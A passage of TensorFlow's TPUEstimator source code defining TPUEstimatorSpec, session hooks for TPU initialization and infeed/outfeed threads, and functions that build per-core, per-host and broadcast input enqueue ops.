from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Use tf.contrib.summary inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
(loss, tracing_calls) = tt.trace_cpu(ops.get_default_graph(),
loss, self.train_op)
tracing_call_ret = _OutfeedHostCall.create_cpu_hostcall(tracing_calls)
tracing_functions = tracing_call_ret.values()
if tracing_functions:
if hooks:
hooks.extend([_OutfeedHostCallHook(tracing_functions)])
else:
hooks = [_OutfeedHostCallHook(tracing_functions)]
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._feed_error = None
self._finished = False
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here to avoid
# suspected issues due to the mesh layout changing on the second
# initialization.
self._should_initialize_tpu = not ctx.model_parallelism_enabled
self._tpu_compile_op = tpu_compile_op
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
self._feed_error = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
sparse_features_list = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping singal.
# This avoids inconsistent state among different model replcias.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, sparse_features = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
sparse_features_list.append(sparse_features)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
sparse_features_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested sturcture
